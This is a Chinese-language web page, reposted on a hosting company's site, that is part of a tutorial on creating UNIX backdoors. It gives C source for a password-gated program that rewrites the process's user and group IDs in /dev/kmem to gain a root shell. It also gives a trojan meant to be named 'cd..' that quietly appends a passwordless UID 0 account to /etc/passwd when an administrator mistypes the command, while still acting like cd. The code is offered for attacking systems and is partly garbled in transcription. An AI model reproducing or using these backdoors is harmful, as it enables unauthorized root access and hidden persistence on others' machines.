創(chuàng)建UNIX后門(mén)(高級(jí)篇) (2) |
發(fā)布時(shí)間: 2012/8/10 18:20:43 |
c, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ if(!(strcmp(pass,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd<0){ printf("Cannot read or write to /dev/kmemn"); perror(argv); exit(10); } userlocation=address(); where=(lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user pagen"); perror(argv); exit(20); } count=read(fd,&userpage,sizeof(struct user)); if(count!=sizeof(struct user)){ printf("Cannot read user pagen"); perror(argv); exit(30); } printf("Current UID: %dn",userpage.u_ruid); printf("Current GID: %dn",userpage.g_ruid); userpage.u_ruid=0; userpage.u_rgid=0; where=lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user pagen"); perror(argv); exit(40); } write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage)); execle("/bin/csh","/bin/csh","-i",(char *)0, envp); } } } <--> [“笨”方法] 你有沒(méi)有曾經(jīng)試過(guò)在 Unix 系統(tǒng)下錯(cuò)把 "cd .." 輸入為 "cd.."?這是由于使用 MS Windows 和 MS-DOS 養(yǎng)成的習(xí)慣。這種錯(cuò)誤網(wǎng)管是否也會(huì)犯呢?如果是這樣的話,可不可以讓他為我們做點(diǎn)“貢獻(xiàn)”呢?:) 例如當(dāng)他輸入 "cd.." 時(shí),會(huì)激活我們的木馬程序。這樣我們就不必登錄到系統(tǒng)去激活木馬了。以下是程序示例: <++> backdoor/dumb.c /* 本程序可在管理員偶然地輸入 cd.. 時(shí)向 /etc/passwd 文件添加一個(gè) UID 0 帳號(hào)。但同時(shí)它也實(shí)現(xiàn) cd .. 功能,從而騙過(guò)管理員。 */ #include #include main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/shn"); system("cd"); } <-->
本文出自:億恩科技【1tcdy.com】 服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM] |